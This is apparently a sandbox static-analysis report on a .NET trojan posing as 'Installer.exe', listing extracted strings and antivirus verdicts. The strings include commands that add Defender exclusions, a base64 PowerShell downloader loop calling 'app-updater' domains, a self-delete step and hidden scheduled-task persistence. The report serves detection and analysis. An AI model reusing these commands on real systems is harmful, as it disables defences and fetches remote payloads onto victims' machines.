Static | ZeroBOX

PE Compile Time

2073-05-16 16:16:09

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x00004708    0x00004800        5.80604742121
.rsrc   0x00008000       0x000016f8    0x00001800        4.66569765179
.reloc  0x0000a000       0x0000000c    0x00000200        0.0815394123432

Resources

Name           Offset      Size        Language      Sub-language     File type
RT_ICON        0x00008100  0x000010a8  LANG_NEUTRAL  SUBLANG_NEUTRAL  dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4278191615, next used block 4278190846
RT_GROUP_ICON  0x000091b8  0x00000014  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_VERSION     0x000091dc  0x0000031c  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST    0x00009508  0x000001ea  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
_VtblGap1_10
__StaticArrayInitTypeSize=240
<>9__4_0
<BytesToString>b__4_0
TASK_TRIGGER_CUSTOM_TRIGGER_01
_VtblGap1_1
_VtblGap2_1
IEnumerable`1
__StaticArrayInitTypeSize=32
Microsoft.Win32
_TASK_TRIGGER_TYPE2
_VtblGap1_2
_VtblGap2_2
Func`2
4C9B68754CC4C6A52C2871B90740059372385833
75848D0CB903E0BB85EFBA101DEA2CDDC4259773
_VtblGap1_3
_VtblGap1_14
_VtblGap2_14
3D3233E7A3B79CD1881DC32A47634BAB3D81D735
_VtblGap1_5
__StaticArrayInitTypeSize=16
E2EC565FBBFD88B08D58EB6A53B2886282E90B27
__StaticArrayInitTypeSize=128
__StaticArrayInitTypeSize=48
get_UTF8
_VtblGap2_8
2CC429832452134629F1F6D296EC8AEFB4E4D8A9
<Module>
<PrivateImplementationDetails>
D7419C1FEFE1C4B130903064A8B712B547EC94DA
TASK_RUNLEVEL_LUA
B9B59E27C8BB660E0B9671A51CBAC83E1416561B
TASK_ACTION_EXEC
AE724C64433159F90A98A611290E281D6E079C8D
GetTypeFromCLSID
TASK_LOGON_PASSWORD
TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD
973088729BBB7AE65DD87AC9E640D069358C1D4E
TASK_ACTION_SHOW_MESSAGE
TASK_TRIGGER_SESSION_STATE_CHANGE
TASK_TRIGGER_IDLE
TASK_TRIGGER_TIME
TASK_LOGON_NONE
_TASK_LOGON_TYPE
_TASK_ACTION_TYPE
42E95E9AF1F2AFF23067A0758B33B28DE272368F
_TASK_RUNLEVEL
TASK_ACTION_SEND_EMAIL
TASK_LOGON_INTERACTIVE_TOKEN
TASK_TRIGGER_LOGON
TASK_TRIGGER_REGISTRATION
TOKEN_ELEVATION
System.IO
TASK_LOGON_GROUP
TASK_ACTION_COM_HANDLER
TASK_TRIGGER_EVENT
TASK_LOGON_SERVICE_ACCOUNT
TASK_TRIGGER_BOOT
TASK_RUNLEVEL_HIGHEST
TASK_LOGON_S4U
set_IV
TASK_TRIGGER_MONTHLYDOW
TASK_TRIGGER_MONTHLY
TASK_TRIGGER_DAILY
TASK_TRIGGER_WEEKLY
TOKEN_QUERY
value__
mscorlib
System.Collections.Generic
UserId
Unload
TokenIsElevated
ReadToEnd
password
ITaskService
CreateInstance
set_Mode
PaddingMode
CryptoStreamMode
CipherMode
get_StartWhenAvailable
set_StartWhenAvailable
pStartWhenAvailable
IEnumerable
IDisposable
RuntimeFieldHandle
RuntimeTypeHandle
CloseHandle
GetTypeFromHandle
TokenHandle
ProcessHandle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_FileName
set_FileName
serverName
DateTime
ValueType
LogonType
System.Core
Dispose
Create
DispIdAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
TypeIdentifierAttribute
CompilationRelaxationsAttribute
CoClassAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
SetValue
Installer.exe
SizeOf
set_Padding
Encoding
System.Runtime.Versioning
FromBase64String
UnloadString
BytesToString
GetString
Missing
get_Path
set_Path
GetFolderPath
TokenInformationLength
ReturnLength
FlushFinalBlock
IRegisteredTask
NewTask
Marshal
IPrincipal
get_Principal
set_Principal
ppPrincipal
get_Interval
set_Interval
pInterval
get_RunLevel
set_RunLevel
pRunLevel
advapi32.dll
kernel32.dll
CryptoStream
MemoryStream
Program
System
SymmetricAlgorithm
ICryptoTransform
get_Hidden
set_Hidden
pHidden
OpenProcessToken
domain
GetTokenInformation
get_Duration
set_Duration
pDuration
TokenElevation
IAction
IExecAction
System.Reflection
IActionCollection
ITriggerCollection
ITaskDefinition
RegisterTaskDefinition
pDefinition
get_Repetition
set_Repetition
ArgumentNullException
IRepetitionPattern
CopyTo
set_StartInfo
ProcessStartInfo
System.Linq
StreamReader
TextReader
ITaskFolder
SpecialFolder
GetFolder
ITrigger
ITimeTrigger
RightsChecker
MLInstaller
TaskScheduler
CurrentUser
get_TargetServer
IsProcessRunningAsAdministrator
Activator
Initializator
.cctor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
plainBytes
EncryptStringToBytes
GetBytes
get_Settings
set_Settings
ITaskSettings
ppSettings
get_Actions
set_Actions
ppActions
System.Collections
get_Triggers
set_Triggers
ppTriggers
RuntimeHelpers
TokenInformationClass
DesiredAccess
GetCurrentProcess
get_Arguments
set_Arguments
AddDays
Concat
ppRepeat
hObject
Select
Connect
WaitForExit
Environment
pArgument
Encrypt
pStart
Convert
System.Text
plainText
cipherText
get_Now
set_CreateNoWindow
InitializeArray
ToArray
set_Key
CreateSubKey
DeleteSubKey
RegistryKey
System.Security.Cryptography
DeleteCurrentFileStealthily
get_StartBoundary
set_StartBoundary
Registry
op_Inequality
IsNullOrEmpty
WrapNonExceptionThrows
Installer
Copyright
2025
$1a2f9219-f2e4-43ad-8a40-a59aba5b0520
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
$BAE54997-48B1-4CBE-9965-D6BE263EBEA4
$02820E19-7B98-4ED2-B2E8-FDCCCEFF619B
$4C3D624D-FD6B-49A3-B9B7-09CB3CD3F047
$D98D51E5-C9B4-496A-A9C1-18980261CF0F
$9C86F320-DEE3-4DD1-B972-A303F26B061E
$7FB9ACF1-26BE-400E-85B5-294B9C75DFD6
$F5BC8FC5-536D-4F77-B852-FBC1356FDEB6
$8CFAC062-A080-4C15-9A88-AA7C2AF80DFC
TargetServer
$2FABA4C7-4DA9-4013-9697-20CC3FD40F85
$8FD4711D-2D02-4C8C-87E3-EFF699DE127E
$B45747E0-EBA7-4276-9F29-85C5BB300006
$09941815-EA89-4B5B-89E0-2A773801FAC3
$85DF5081-1B24-4F32-878A-D9D14DF4CB77
ZSystem.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
$e34cb9f1-c7f7-424c-be29-027dcc09363aTaskScheduler._TASK_ACTION_TYPE
$e34cb9f1-c7f7-424c-be29-027dcc09363a
TaskScheduler._TASK_LOGON_TYPE
$e34cb9f1-c7f7-424c-be29-027dcc09363a
TaskScheduler._TASK_RUNLEVEL
$e34cb9f1-c7f7-424c-be29-027dcc09363a!TaskScheduler._TASK_TRIGGER_TYPE2
_CorExeMain
mscoree.dll
?OwgZ-
P]1&{W
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Set-MpPreference -ControlledFolderAccessAllowedApplications "
%systemroot%
\System32\mshta.exe"
Add-MpPreference -ExclusionProcess "
\System32\WindowsPowerShell\v1.0\powershell.exe"
-Command "
JHdjPU5ldy1PYmplY3QgTmV0LldlYkNsaWVudDtmb3JlYWNoKCRpIGluIDEuLjEwMDApeyR1cmw9Imh0dHBzOi8vYXBwLXVwZGF0ZXIkaS5hcHAvYXBpL2dldEZpbGU/Zm49
platon
0F87369F-A4E5-4CFC-BD3E-73E6154572DD
yyyy-MM-ddTHH:mm:ss
P9999D
/C timeout 1 && del "
cmd.exe
plainText
new byte[]{
cipherText
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Installer
FileVersion
1.0.0.0
InternalName
Installer.exe
LegalCopyright
Copyright
2025
LegalTrademarks
OriginalFilename
Installer.exe
ProductName
Installer
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (moderate confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Trojan.Ghanarava.1743195433b0dcf3
Skyhigh Clean
ALYac IL:Trojan.MSILZilla.158139
Cylance Unsafe
Zillya Clean
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_90% (W)
Alibaba Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Generic.Malware
ESET-NOD32 a variant of Generik.FCXQVAI potentially unwanted
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.MSIL.SelfDel.gen
BitDefender IL:Trojan.MSILZilla.158139
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Agent.25600.QW
MicroWorld-eScan IL:Trojan.MSILZilla.158139
Tencent Clean
Sophos Generic ML PUA (PUA)
F-Secure Clean
DrWeb Clean
VIPRE IL:Trojan.MSILZilla.158139
TrendMicro Clean
Trapmine Clean
CTX exe.trojan.msilzilla
Emsisoft IL:Trojan.MSILZilla.158139 (B)
Ikarus Clean
FireEye Generic.mg.00745fc06cd3afea
Jiangmin Clean
Webroot Clean
Varist W32/ABTrojan.VTIC-6310
Avira Clean
Fortinet Malicious_Behavior.SB
Antiy-AVL GrayWare/Win32.Wacapew
Kingsoft malware.kb.c.981
Gridinsoft Trojan.Win32.Wacapew.sa
Xcitium Clean
Arcabit IL:Trojan.MSILZilla.D269BB
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Wacatac.B!ml
Google Detected
AhnLab-V3 Trojan/Win.MSILZilla.C5746629
Acronis Clean
McAfee Artemis!00745FC06CD3
TACHYON Clean
VBA32 Clean
Malwarebytes Generic.Malware/Suspicious
Panda Clean
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R002H09CS25
Rising Clean
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.241401018.susgen
GData IL:Trojan.MSILZilla.158139
AVG Win32:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.